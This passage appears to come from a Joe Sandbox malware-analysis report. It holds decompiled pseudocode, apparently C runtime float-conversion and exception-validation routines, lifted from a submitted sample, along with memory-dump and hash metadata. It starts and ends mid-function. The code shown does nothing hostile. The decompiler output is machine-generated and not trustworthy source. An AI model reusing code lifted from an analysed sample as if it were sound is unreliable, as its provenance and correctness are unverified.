      								__eflags = 0;
      							} else {
      								_t427 =  &_v36;
      								asm("stosd");
      								asm("stosd");
      								asm("stosd");
      								_v36 = _v36 | 0x80000000;
      								asm("cdq");
      								_t253 = _t307 + (_t372 & 0x0000001f) >> 5;
      								_t382 = _t307 & 0x8000001f;
      								__eflags = _t382;
      								if(_t382 < 0) {
      									_t382 = (_t382 - 0x00000001 | 0xffffffe0) + 1;
      									__eflags = _t382;
      								}
      								_v16 = _v16 & 0x00000000;
      								_a4 = _a4 & 0x00000000;
      								_v8 = 0x20;
      								_t165 =  &_v8;
      								 *_t165 = _v8 - _t382;
      								__eflags =  *_t165;
      								_t430 =  !((_t427 | 0xffffffff) << _t382);
      								do {
      									_t291 = _t493 + _a4 * 4 - 0x20;
      									_t456 =  *_t291;
      									_v20 = _t456 & _t430;
      									 *_t291 = _t456 >> _t382 | _v16;
      									_a4 = _a4 + 1;
      									__eflags = _a4 - 3;
      									_v16 = _v20 << _v8;
      								} while (_a4 < 3);
      								_t383 = 2;
      								_t331 =  &_v28 - (_t253 << 2);
      								__eflags = _t331;
      								do {
      									__eflags = _t383 - _t253;
      									if(_t383 < _t253) {
      										_t183 = _t493 + _t383 * 4 - 0x20;
      										 *_t183 =  *(_t493 + _t383 * 4 - 0x20) & 0x00000000;
      										__eflags =  *_t183;
      									} else {
      										 *(_t493 + _t383 * 4 - 0x20) =  *_t331;
      									}
      									_t383 = _t383 - 1;
      									_t331 = _t331 - 4;
      									__eflags = _t383;
      								} while (_t383 >= 0);
      								_t254 =  *0x42cbfc; // 0x80
      								_t332 =  *0x42cc10; // 0x7f
      								_t286 = _t332 + _t254;
      								_t249 = 1;
      							}
      						} else {
      							_t256 = _t244 - _v20;
      							_t431 =  &_v36;
      							asm("movsd");
      							asm("cdq");
      							asm("movsd");
      							_t258 = _t256 + (_t372 & 0x0000001f) >> 5;
      							_t388 = _t256 & 0x8000001f;
      							__eflags = _t388;
      							asm("movsd");
      							if(_t388 < 0) {
      								_t388 = (_t388 - 0x00000001 | 0xffffffe0) + 1;
      								__eflags = _t388;
      							}
      							_v16 = _v16 & 0x00000000;
      							_a4 = _a4 & 0x00000000;
      							_v8 = 0x20;
      							_t70 =  &_v8;
      							 *_t70 = _v8 - _t388;
      							__eflags =  *_t70;
      							_t434 =  !((_t431 | 0xffffffff) << _t388);
      							do {
      								_t293 = _t493 + _a4 * 4 - 0x20;
      								_t465 =  *_t293;
      								_v20 = _t465 & _t434;
      								 *_t293 = _t465 >> _t388 | _v16;
      								_a4 = _a4 + 1;
      								__eflags = _a4 - 3;
      								_v16 = _v20 << _v8;
      							} while (_a4 < 3);
      							_t389 = 2;
      							_t340 =  &_v28 - (_t258 << 2);
      							__eflags = _t340;
      							do {
      								__eflags = _t389 - _t258;
      								if(_t389 < _t258) {
      									_t88 = _t493 + _t389 * 4 - 0x20;
      									 *_t88 =  *(_t493 + _t389 * 4 - 0x20) & 0x00000000;
      									__eflags =  *_t88;
      								} else {
      									 *(_t493 + _t389 * 4 - 0x20) =  *_t340;
      								}
      								_t389 = _t389 - 1;
      								_t340 = _t340 - 4;
      								__eflags = _t389;
      							} while (_t389 >= 0);
      							_t473 =  *0x42cc04; // 0x18
      							_t474 = _t473 - 1;
      							_t94 = _t474 + 1; // 0x18
      							_t341 = _t94;
      							asm("cdq");
      							_t261 = _t341 + (_t389 & 0x0000001f) >> 5;
      							_t392 = _t341 & 0x8000001f;
      							__eflags = _t392;
      							_v16 = _t261;
      							if(_t392 < 0) {
      								_t392 = (_t392 - 0x00000001 | 0xffffffe0) + 1;
      								__eflags = _t392;
      							}
      							_t342 = 0x1f;
      							_t343 = _t342 - _t392;
      							_t395 = 1 << _t343;
      							_t294 = _t493 + _t261 * 4 - 0x20;
      							_v20 = _t343;
      							__eflags =  *_t294 & 1;
      							if(( *_t294 & 1) != 0) {
      								_t395 =  !((_t395 | 0xffffffff) << _t343);
      								__eflags =  *(_t493 + _t261 * 4 - 0x20) & 1;
      								while(__eflags == 0) {
      									_t261 = _t261 + 1;
      									__eflags = _t261 - 3;
      									if(_t261 < 3) {
      										__eflags =  *(_t493 + _t261 * 4 - 0x20);
      										continue;
      									} else {
      									}
      									goto L61;
      								}
      								asm("cdq");
      								_t357 = 0x1f;
      								_t273 = _t474 + (_t395 & _t357) >> 5;
      								_t483 = _t474 & 0x8000001f;
      								__eflags = _t483;
      								if(_t483 < 0) {
      									_t483 = (_t483 - 0x00000001 | 0xffffffe0) + 1;
      									__eflags = _t483;
      								}
      								_a4 = _a4 & 0x00000000;
      								_t395 = 1 << _t357 - _t483;
      								_t359 = _t493 + _t273 * 4 - 0x20;
      								_t484 =  *_t359;
      								_t434 = _t484 + 1;
      								__eflags = _t434 - _t484;
      								if(_t434 < _t484) {
      									L53:
      									_a4 = 1;
      								} else {
      									__eflags = _t434 - 1;
      									if(_t434 < 1) {
      										goto L53;
      									}
      								}
      								 *_t359 = _t434;
      								_t360 = _a4;
      								while(1) {
      									_t261 = _t273 - 1;
      									__eflags = _t261;
      									if(_t261 < 0) {
      										goto L61;
      									}
      									__eflags = _t360;
      									if(_t360 != 0) {
      										_t361 = _t493 + _t261 * 4 - 0x20;
      										_t395 =  *_t361;
      										_t121 = _t395 + 1; // 0x2
      										_t485 = _t121;
      										__eflags = _t485 - _t395;
      										if(_t485 < _t395) {
      											L58:
      											_t434 = 1;
      											__eflags = 1;
      										} else {
      											__eflags = _t485 - 1;
      											if(_t485 < 1) {
      												goto L58;
      											}
      										}
      										 *_t361 = _t485;
      										_t360 = _t434;
      										continue;
      									}
      									goto L61;
      								}
      							}
      							L61:
      							 *_t294 =  *_t294 & (_t261 | 0xffffffff) << _v20;
      							_t265 = _v16 + 1;
      							__eflags = _t265 - 3;
      							if(_t265 < 3) {
      								_t354 = 3;
      								_t438 = _t493 + _t265 * 4 - 0x20;
      								_t355 = _t354 - _t265;
      								__eflags = 0;
      								memset(_t438, 0, _t355 << 2);
      								_t434 = _t438 + _t355;
      							}
      							_t345 =  *0x42cc08; // 0x8
      							_t346 = _t345 + 1;
      							asm("cdq");
      							_t268 = _t346 + (_t395 & 0x0000001f) >> 5;
      							_t398 = _t346 & 0x8000001f;
      							__eflags = _t398;
      							if(_t398 < 0) {
      								_t398 = (_t398 - 0x00000001 | 0xffffffe0) + 1;
      								__eflags = _t398;
      							}
      							_v16 = _v16 & 0x00000000;
      							_a4 = _a4 & 0x00000000;
      							_v8 = 0x20;
      							_t133 =  &_v8;
      							 *_t133 = _v8 - _t398;
      							__eflags =  *_t133;
      							_t437 =  !((_t434 | 0xffffffff) << _t398);
      							do {
      								_t296 = _t493 + _a4 * 4 - 0x20;
      								_t475 =  *_t296;
      								_v20 = _t475 & _t437;
      								 *_t296 = _t475 >> _t398 | _v16;
      								_a4 = _a4 + 1;
      								__eflags = _a4 - 3;
      								_v16 = _v20 << _v8;
      							} while (_a4 < 3);
      							_t399 = 2;
      							_t353 =  &_v28 - (_t268 << 2);
      							__eflags = _t353;
      							do {
      								__eflags = _t399 - _t268;
      								if(_t399 < _t268) {
      									_t151 = _t493 + _t399 * 4 - 0x20;
      									 *_t151 =  *(_t493 + _t399 * 4 - 0x20) & 0x00000000;
      									__eflags =  *_t151;
      								} else {
      									 *(_t493 + _t399 * 4 - 0x20) =  *_t353;
      								}
      								_t399 = _t399 - 1;
      								_t353 = _t353 - 4;
      								__eflags = _t399;
      							} while (_t399 >= 0);
      							goto L72;
      						}
      					} else {
      						asm("stosd");
      						asm("stosd");
      						asm("stosd");
      						L72:
      						_t286 = 0;
      						_t249 = 2;
      					}
      				} else {
      					_t286 = 0;
      					_t281 = 0;
      					while( *((intOrPtr*)(_t493 + _t281 * 4 - 0x20)) == _t286) {
      						_t281 = _t281 + 1;
      						if(_t281 < 3) {
      							continue;
      						} else {
      							_t249 = 0;
      						}
      						goto L95;
      					}
      					asm("stosd");
      					asm("stosd");
      					asm("stosd");
      					_t249 = 2;
      				}
      				L95:
      				_t317 = 0x1f;
      				asm("sbb ecx, ecx");
      				_t322 =  *0x42cc0c; // 0x20
      				_t289 = _t286 << _t317 -  *0x42cc08 |  ~_v24 & 0x80000000 | _v36;
      				if(_t322 == 0x40) {
      					_t324 = _a8;
      					_t324[2] = _t289;
      					 *_t324 = _v32;
      					return _t249;
      				}
      				__eflags = _t322 - 0x20;
      				if(_t322 == 0x20) {
      					 *_a8 = _t289;
      					return _t249;
      				}
      				return _t249;
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
      • Instruction ID: 2d1c1fda648c1f10975837b91237ef28666af25bb28fe1228fba60b4b0f928a2
      • Opcode Fuzzy Hash: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
      • Instruction Fuzzy Hash: F402F872E105199BDF08CF68D8403EDB3B2FBD9365F25822ED926A72D0C7746A45CB84
      C-Code - Quality: 92%
      			E00413F07(signed int _a4, signed int* _a8) {
      				signed int _v8;
      				signed int _v12;
      				signed int _v16;
      				signed int _v20;
      				signed int _v24;
      				signed int _v28;
      				signed short _v32;
      				signed int _v36;
      				void* _v48;
      				signed short* _t231;
      				signed int _t236;
      				signed int _t239;
      				signed int _t243;
      				intOrPtr _t244;
      				intOrPtr _t245;
      				signed int _t248;
      				void* _t249;
      				signed int _t253;
      				intOrPtr _t254;
      				signed int _t256;
      				signed int _t258;
      				signed int _t261;
      				signed int _t265;
      				signed int _t268;
      				signed int _t273;
      				signed int _t277;
      				signed int _t280;
      				signed int _t281;
      				signed int _t285;
      				signed int _t286;
      				signed int _t289;
      				signed int* _t291;
      				signed int* _t293;
      				signed int* _t294;
      				signed int* _t296;
      				signed int _t297;
      				signed int _t301;
      				void* _t302;
      				signed char _t303;
      				signed int _t307;
      				signed int _t316;
      				void* _t317;
      				intOrPtr _t322;
      				signed short* _t324;
      				signed int _t331;
      				intOrPtr _t332;
      				signed int _t340;
      				signed int _t341;
      				void* _t342;
      				signed char _t343;
      				signed int _t345;
      				signed int _t346;
      				signed int _t353;
      				void* _t354;
      				signed int _t355;
      				signed int _t357;
      				signed int* _t359;
      				signed int _t360;
      				signed int* _t361;
      				void* _t362;
      				signed int _t365;
      				signed int* _t367;
      				signed int _t368;
      				signed int _t369;
      				signed int _t372;
      				signed int _t375;
      				signed int _t376;
      				signed int _t382;
      				signed int _t383;
      				signed int _t388;
      				signed int _t389;
      				signed int _t392;
      				signed int _t395;
      				signed int _t398;
      				signed int _t399;
      				signed int _t416;
      				signed int* _t421;
      				unsigned int _t422;
      				signed int _t427;
      				signed int _t430;
      				signed int _t431;
      				signed int _t434;
      				signed int _t437;
      				void* _t438;
      				intOrPtr _t447;
      				signed int _t448;
      				signed int _t451;
      				unsigned int _t456;
      				unsigned int _t465;
      				intOrPtr _t473;
      				signed int _t474;
      				unsigned int _t475;
      				signed int _t483;
      				signed int _t484;
      				signed int _t485;
      				signed int _t488;
      				void* _t493;
      				void* _t494;
      
      				_t231 = _a4;
      				_t297 = _t231[5] & 0x0000ffff;
      				_v24 = _t297 & 0x00008000;
      				_v36 = _t231[3];
      				_t285 = (_t297 & 0x00007fff) - 0x3fff;
      				_v32 = _t231[1];
      				_v28 = ( *_t231 & 0x0000ffff) << 0x10;
      				if(_t285 != 0xffffc001) {
      					_a4 = _a4 & 0x00000000;
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t447 =  *0x42cbec; // 0x35
      					_t448 = _t447 - 1;
      					_t17 = _t448 + 1; // 0x35
      					_t301 = _t17;
      					asm("cdq");
      					_t236 = _t301 + (_t369 & 0x0000001f) >> 5;
      					_t372 = _t301 & 0x8000001f;
      					__eflags = _t372;
      					_v20 = _t285;
      					_v16 = _t236;
      					if(_t372 < 0) {
      						_t372 = (_t372 - 0x00000001 | 0xffffffe0) + 1;
      						__eflags = _t372;
      					}
      					_t421 = _t493 + _t236 * 4 - 0x20;
      					_t302 = 0x1f;
      					_t303 = _t302 - _t372;
      					_t239 = 1 << _t303;
      					_v12 = _t303;
      					__eflags =  *_t421 & 1;
      					if(( *_t421 & 1) != 0) {
      						_t277 = _v16;
      						_t372 =  !((_t372 | 0xffffffff) << _t303);
      						__eflags =  *(_t493 + _t277 * 4 - 0x20) & _t372;
      						while(__eflags == 0) {
      							_t277 = _t277 + 1;
      							__eflags = _t277 - 3;
      							if(_t277 < 3) {
      								__eflags =  *(_t493 + _t277 * 4 - 0x20);
      								continue;
      							} else {
      							}
      							goto L25;
      						}
      						asm("cdq");
      						_t365 = 0x1f;
      						_t280 = _t448 + (_t372 & _t365) >> 5;
      						_t488 = _t448 & 0x8000001f;
      						__eflags = _t488;
      						if(_t488 < 0) {
      							_t488 = (_t488 - 0x00000001 | 0xffffffe0) + 1;
      							__eflags = _t488;
      						}
      						_v8 = _v8 & 0x00000000;
      						_t416 = 1 << _t365 - _t488;
      						_t367 = _t493 + _t280 * 4 - 0x20;
      						_a4 =  *_t367 + 1;
      						_t448 =  *_t367;
      						__eflags = _a4 - _t448;
      						if(_a4 < _t448) {
      							L22:
      							_v8 = 1;
      						} else {
      							__eflags = _a4 - _t416;
      							L21:
      							if(__eflags < 0) {
      								goto L22;
      							}
      						}
      						L23:
      						_t239 = _t280 - 1;
      						__eflags = _t239;
      						_t372 = _a4;
      						 *_t367 = _t372;
      						_t368 = _v8;
      						if(_t239 >= 0) {
      							__eflags = _t368;
      							if(_t368 != 0) {
      								_v8 = _v8 & 0x00000000;
      								_t367 = _t493 + _t239 * 4 - 0x20;
      								_t48 =  *_t367 + 1; // 0x1
      								_t448 = _t48;
      								__eflags = _t448 -  *_t367;
      								_a4 = _t448;
      								if(_t448 <  *_t367) {
      									goto L22;
      								} else {
      									__eflags = _t448 - 1;
      									goto L21;
      								}
      								goto L23;
      							}
      						}
      						_a4 = _t368;
      					}
      					L25:
      					 *_t421 =  *_t421 & (_t239 | 0xffffffff) << _v12;
      					_t243 = _v16 + 1;
      					__eflags = _t243 - 3;
      					if(_t243 < 3) {
      						_t362 = 3;
      						__eflags = 0;
      						memset(_t493 + _t243 * 4 - 0x20, 0, _t362 - _t243 << 2);
      						_t494 = _t494 + 0xc;
      					}
      					__eflags = _a4;
      					if(_a4 != 0) {
      						_t285 = _t285 + 1;
      						__eflags = _t285;
      					}
      					_t244 =  *0x42cbe8; // 0xfffffc01
      					__eflags = _t285 - _t244 -  *0x42cbec;
      					if(_t285 >= _t244 -  *0x42cbec) {
      						__eflags = _t285 - _t244;
      						if(_t285 > _t244) {
      							__eflags = _t285 -  *0x42cbe4; // 0x400
      							_t307 =  *0x42cbf0; // 0xb
      							if(__eflags < 0) {
      								_t245 =  *0x42cbf8; // 0x3ff
      								_v36 = _v36 & 0x7fffffff;
      								_t286 = _t285 + _t245;
      								asm("cdq");
      								_t248 = _t307 + (_t372 & 0x0000001f) >> 5;
      								_t375 = _t307 & 0x8000001f;
      								__eflags = _t375;
      								if(_t375 < 0) {
      									_t375 = (_t375 - 0x00000001 | 0xffffffe0) + 1;
      									__eflags = _t375;
      								}
      								_v16 = _v16 & 0x00000000;
      								_a4 = _a4 & 0x00000000;
      								_v8 = 0x20;
      								_t197 =  &_v8;
      								 *_t197 = _v8 - _t375;
      								__eflags =  *_t197;
      								_t451 =  !((_t448 | 0xffffffff) << _t375);
      								do {
      									_t422 =  *(_t493 + _a4 * 4 - 0x20);
      									_v20 = _t422 & _t451;
      									 *(_t493 + _a4 * 4 - 0x20) = _t422 >> _t375 | _v16;
      									_a4 = _a4 + 1;
      									__eflags = _a4 - 3;
      									_v16 = _v20 << _v8;
      								} while (_a4 < 3);
      								_t376 = 2;
      								_t316 =  &_v28 - (_t248 << 2);
      								__eflags = _t316;
      								do {
      									__eflags = _t376 - _t248;
      									if(_t376 < _t248) {
      										_t219 = _t493 + _t376 * 4 - 0x20;
      										 *_t219 =  *(_t493 + _t376 * 4 - 0x20) & 0x00000000;
      										__eflags =  *_t219;
      									} else {
      										 *(_t493 + _t376 * 4 - 0x20) =  *_t316;
      									}
      									_t376 = _t376 - 1;
      									_t316 = _t316 - 4;
      									__eflags = _t376;
      								} while (_t376 >= 0);
      								_t249 = 0;
      								__eflags = 0;
      							} else {
      								_t427 =  &_v36;
      								asm("stosd");
      								asm("stosd");
      								asm("stosd");
      								_v36 = _v36 | 0x80000000;
      								asm("cdq");
      								_t253 = _t307 + (_t372 & 0x0000001f) >> 5;
      								_t382 = _t307 & 0x8000001f;
      								__eflags = _t382;
      								if(_t382 < 0) {
      									_t382 = (_t382 - 0x00000001 | 0xffffffe0) + 1;
      									__eflags = _t382;
      								}
      								_v16 = _v16 & 0x00000000;
      								_a4 = _a4 & 0x00000000;
      								_v8 = 0x20;
      								_t165 =  &_v8;
      								 *_t165 = _v8 - _t382;
      								__eflags =  *_t165;
      								_t430 =  !((_t427 | 0xffffffff) << _t382);
      								do {
      									_t291 = _t493 + _a4 * 4 - 0x20;
      									_t456 =  *_t291;
      									_v20 = _t456 & _t430;
      									 *_t291 = _t456 >> _t382 | _v16;
      									_a4 = _a4 + 1;
      									__eflags = _a4 - 3;
      									_v16 = _v20 << _v8;
      								} while (_a4 < 3);
      								_t383 = 2;
      								_t331 =  &_v28 - (_t253 << 2);
      								__eflags = _t331;
      								do {
      									__eflags = _t383 - _t253;
      									if(_t383 < _t253) {
      										_t183 = _t493 + _t383 * 4 - 0x20;
      										 *_t183 =  *(_t493 + _t383 * 4 - 0x20) & 0x00000000;
      										__eflags =  *_t183;
      									} else {
      										 *(_t493 + _t383 * 4 - 0x20) =  *_t331;
      									}
      									_t383 = _t383 - 1;
      									_t331 = _t331 - 4;
      									__eflags = _t383;
      								} while (_t383 >= 0);
      								_t254 =  *0x42cbe4; // 0x400
      								_t332 =  *0x42cbf8; // 0x3ff
      								_t286 = _t332 + _t254;
      								_t249 = 1;
      							}
      						} else {
      							_t256 = _t244 - _v20;
      							_t431 =  &_v36;
      							asm("movsd");
      							asm("cdq");
      							asm("movsd");
      							_t258 = _t256 + (_t372 & 0x0000001f) >> 5;
      							_t388 = _t256 & 0x8000001f;
      							__eflags = _t388;
      							asm("movsd");
      							if(_t388 < 0) {
      								_t388 = (_t388 - 0x00000001 | 0xffffffe0) + 1;
      								__eflags = _t388;
      							}
      							_v16 = _v16 & 0x00000000;
      							_a4 = _a4 & 0x00000000;
      							_v8 = 0x20;
      							_t70 =  &_v8;
      							 *_t70 = _v8 - _t388;
      							__eflags =  *_t70;
      							_t434 =  !((_t431 | 0xffffffff) << _t388);
      							do {
      								_t293 = _t493 + _a4 * 4 - 0x20;
      								_t465 =  *_t293;
      								_v20 = _t465 & _t434;
      								 *_t293 = _t465 >> _t388 | _v16;
      								_a4 = _a4 + 1;
      								__eflags = _a4 - 3;
      								_v16 = _v20 << _v8;
      							} while (_a4 < 3);
      							_t389 = 2;
      							_t340 =  &_v28 - (_t258 << 2);
      							__eflags = _t340;
      							do {
      								__eflags = _t389 - _t258;
      								if(_t389 < _t258) {
      									_t88 = _t493 + _t389 * 4 - 0x20;
      									 *_t88 =  *(_t493 + _t389 * 4 - 0x20) & 0x00000000;
      									__eflags =  *_t88;
      								} else {
      									 *(_t493 + _t389 * 4 - 0x20) =  *_t340;
      								}
      								_t389 = _t389 - 1;
      								_t340 = _t340 - 4;
      								__eflags = _t389;
      							} while (_t389 >= 0);
      							_t473 =  *0x42cbec; // 0x35
      							_t474 = _t473 - 1;
      							_t94 = _t474 + 1; // 0x35
      							_t341 = _t94;
      							asm("cdq");
      							_t261 = _t341 + (_t389 & 0x0000001f) >> 5;
      							_t392 = _t341 & 0x8000001f;
      							__eflags = _t392;
      							_v16 = _t261;
      							if(_t392 < 0) {
      								_t392 = (_t392 - 0x00000001 | 0xffffffe0) + 1;
      								__eflags = _t392;
      							}
      							_t342 = 0x1f;
      							_t343 = _t342 - _t392;
      							_t395 = 1 << _t343;
      							_t294 = _t493 + _t261 * 4 - 0x20;
      							_v20 = _t343;
      							__eflags =  *_t294 & 1;
      							if(( *_t294 & 1) != 0) {
      								_t395 =  !((_t395 | 0xffffffff) << _t343);
      								__eflags =  *(_t493 + _t261 * 4 - 0x20) & 1;
      								while(__eflags == 0) {
      									_t261 = _t261 + 1;
      									__eflags = _t261 - 3;
      									if(_t261 < 3) {
      										__eflags =  *(_t493 + _t261 * 4 - 0x20);
      										continue;
      									} else {
      									}
      									goto L61;
      								}
      								asm("cdq");
      								_t357 = 0x1f;
      								_t273 = _t474 + (_t395 & _t357) >> 5;
      								_t483 = _t474 & 0x8000001f;
      								__eflags = _t483;
      								if(_t483 < 0) {
      									_t483 = (_t483 - 0x00000001 | 0xffffffe0) + 1;
      									__eflags = _t483;
      								}
      								_a4 = _a4 & 0x00000000;
      								_t395 = 1 << _t357 - _t483;
      								_t359 = _t493 + _t273 * 4 - 0x20;
      								_t484 =  *_t359;
      								_t434 = _t484 + 1;
      								__eflags = _t434 - _t484;
      								if(_t434 < _t484) {
      									L53:
      									_a4 = 1;
      								} else {
      									__eflags = _t434 - 1;
      									if(_t434 < 1) {
      										goto L53;
      									}
      								}
      								 *_t359 = _t434;
      								_t360 = _a4;
      								while(1) {
      									_t261 = _t273 - 1;
      									__eflags = _t261;
      									if(_t261 < 0) {
      										goto L61;
      									}
      									__eflags = _t360;
      									if(_t360 != 0) {
      										_t361 = _t493 + _t261 * 4 - 0x20;
      										_t395 =  *_t361;
      										_t121 = _t395 + 1; // 0x2
      										_t485 = _t121;
      										__eflags = _t485 - _t395;
      										if(_t485 < _t395) {
      											L58:
      											_t434 = 1;
      											__eflags = 1;
      										} else {
      											__eflags = _t485 - 1;
      											if(_t485 < 1) {
      												goto L58;
      											}
      										}
      										 *_t361 = _t485;
      										_t360 = _t434;
      										continue;
      									}
      									goto L61;
      								}
      							}
      							L61:
      							 *_t294 =  *_t294 & (_t261 | 0xffffffff) << _v20;
      							_t265 = _v16 + 1;
      							__eflags = _t265 - 3;
      							if(_t265 < 3) {
      								_t354 = 3;
      								_t438 = _t493 + _t265 * 4 - 0x20;
      								_t355 = _t354 - _t265;
      								__eflags = 0;
      								memset(_t438, 0, _t355 << 2);
      								_t434 = _t438 + _t355;
      							}
      							_t345 =  *0x42cbf0; // 0xb
      							_t346 = _t345 + 1;
      							asm("cdq");
      							_t268 = _t346 + (_t395 & 0x0000001f) >> 5;
      							_t398 = _t346 & 0x8000001f;
      							__eflags = _t398;
      							if(_t398 < 0) {
      								_t398 = (_t398 - 0x00000001 | 0xffffffe0) + 1;
      								__eflags = _t398;
      							}
      							_v16 = _v16 & 0x00000000;
      							_a4 = _a4 & 0x00000000;
      							_v8 = 0x20;
      							_t133 =  &_v8;
      							 *_t133 = _v8 - _t398;
      							__eflags =  *_t133;
      							_t437 =  !((_t434 | 0xffffffff) << _t398);
      							do {
      								_t296 = _t493 + _a4 * 4 - 0x20;
      								_t475 =  *_t296;
      								_v20 = _t475 & _t437;
      								 *_t296 = _t475 >> _t398 | _v16;
      								_a4 = _a4 + 1;
      								__eflags = _a4 - 3;
      								_v16 = _v20 << _v8;
      							} while (_a4 < 3);
      							_t399 = 2;
      							_t353 =  &_v28 - (_t268 << 2);
      							__eflags = _t353;
      							do {
      								__eflags = _t399 - _t268;
      								if(_t399 < _t268) {
      									_t151 = _t493 + _t399 * 4 - 0x20;
      									 *_t151 =  *(_t493 + _t399 * 4 - 0x20) & 0x00000000;
      									__eflags =  *_t151;
      								} else {
      									 *(_t493 + _t399 * 4 - 0x20) =  *_t353;
      								}
      								_t399 = _t399 - 1;
      								_t353 = _t353 - 4;
      								__eflags = _t399;
      							} while (_t399 >= 0);
      							goto L72;
      						}
      					} else {
      						asm("stosd");
      						asm("stosd");
      						asm("stosd");
      						L72:
      						_t286 = 0;
      						_t249 = 2;
      					}
      				} else {
      					_t286 = 0;
      					_t281 = 0;
      					while( *((intOrPtr*)(_t493 + _t281 * 4 - 0x20)) == _t286) {
      						_t281 = _t281 + 1;
      						if(_t281 < 3) {
      							continue;
      						} else {
      							_t249 = 0;
      						}
      						goto L95;
      					}
      					asm("stosd");
      					asm("stosd");
      					asm("stosd");
      					_t249 = 2;
      				}
      				L95:
      				_t317 = 0x1f;
      				asm("sbb ecx, ecx");
      				_t322 =  *0x42cbf4; // 0x40
      				_t289 = _t286 << _t317 -  *0x42cbf0 |  ~_v24 & 0x80000000 | _v36;
      				if(_t322 == 0x40) {
      					_t324 = _a8;
      					_t324[2] = _t289;
      					 *_t324 = _v32;
      					return _t249;
      				}
      				__eflags = _t322 - 0x20;
      				if(_t322 == 0x20) {
      					 *_a8 = _t289;
      					return _t249;
      				}
      				return _t249;
      			}

      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
      • Instruction ID: ee01d1faeee44ef12e4e3cf103a29a5988aec0003df79e6e441c58099ca84b5c
      • Opcode Fuzzy Hash: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
      • Instruction Fuzzy Hash: 1702EB32E105199BDF04CF59D8403EDB7B2FBD8355F25C26ED926AB280C3746A86CB84
      C-Code - Quality: 100%
      			E0040318D(long _a4) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				signed int _v16;
      				short* _v32;
      				void _v36;
      				void* _t57;
      				signed int _t58;
      				signed int _t61;
      				signed int _t62;
      				void* _t63;
      				signed int* _t68;
      				intOrPtr* _t69;
      				intOrPtr* _t71;
      				intOrPtr _t72;
      				intOrPtr _t75;
      				void* _t76;
      				signed int _t77;
      				void* _t78;
      				void _t80;
      				signed int _t81;
      				signed int _t84;
      				signed int _t86;
      				short* _t87;
      				void* _t89;
      				signed int* _t90;
      				long _t91;
      				signed int _t93;
      				signed int _t94;
      				signed int _t100;
      				signed int _t102;
      				void* _t104;
      				long _t108;
      				signed int _t110;
      
      				_t108 = _a4;
      				_t76 =  *(_t108 + 8);
      				if((_t76 & 0x00000003) != 0) {
      					L3:
      					return 0;
      				}
      				_a4 =  *[fs:0x4];
      				_v8 =  *[fs:0x8];
      				if(_t76 < _v8 || _t76 >= _a4) {
      					_t102 =  *(_t108 + 0xc);
      					__eflags = _t102 - 0xffffffff;
      					if(_t102 != 0xffffffff) {
      						_t91 = 0;
      						__eflags = 0;
      						_a4 = 0;
      						_t57 = _t76;
      						do {
      							_t80 =  *_t57;
      							__eflags = _t80 - 0xffffffff;
      							if(_t80 == 0xffffffff) {
      								goto L9;
      							}
      							__eflags = _t80 - _t91;
      							if(_t80 >= _t91) {
      								L20:
      								_t63 = 0;
      								L60:
      								return _t63;
      							}
      							L9:
      							__eflags =  *(_t57 + 4);
      							if( *(_t57 + 4) != 0) {
      								_t12 =  &_a4;
      								 *_t12 = _a4 + 1;
      								__eflags =  *_t12;
      							}
      							_t91 = _t91 + 1;
      							_t57 = _t57 + 0xc;
      							__eflags = _t91 - _t102;
      						} while (_t91 <= _t102);
      						__eflags = _a4;
      						if(_a4 == 0) {
      							L15:
      							_t81 =  *0x4054d0; // 0x0
      							_t110 = _t76 & 0xfffff000;
      							_t58 = 0;
      							__eflags = _t81;
      							if(_t81 <= 0) {
      								L18:
      								_t104 = _t102 | 0xffffffff;
      								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
      								__eflags = _t61;
      								if(_t61 < 0) {
      									_t62 = 0;
      									__eflags = 0;
      								} else {
      									_t62 = _a4;
      								}
      								__eflags = _t62;
      								if(_t62 == 0) {
      									L59:
      									_t63 = _t104;
      									goto L60;
      								} else {
      									__eflags = _v12 - 0x1000000;
      									if(_v12 != 0x1000000) {
      										goto L59;
      									}
      									__eflags = _v16 & 0x000000cc;
      									if((_v16 & 0x000000cc) == 0) {
      										L46:
      										_t63 = 1;
      										 *0x405518 = 1;
      										__eflags =  *0x405518;
      										if( *0x405518 != 0) {
      											goto L60;
      										}
      										_t84 =  *0x4054d0; // 0x0
      										__eflags = _t84;
      										_t93 = _t84;
      										if(_t84 <= 0) {
      											L51:
      											__eflags = _t93;
      											if(_t93 != 0) {
      												L58:
      												 *0x405518 = 0;
      												goto L5;
      											}
      											_t77 = 0xf;
      											__eflags = _t84 - _t77;
      											if(_t84 <= _t77) {
      												_t77 = _t84;
      											}
      											_t94 = 0;
      											__eflags = _t77;
      											if(_t77 < 0) {
      												L56:
      												__eflags = _t84 - 0x10;
      												if(_t84 < 0x10) {
      													_t86 = _t84 + 1;
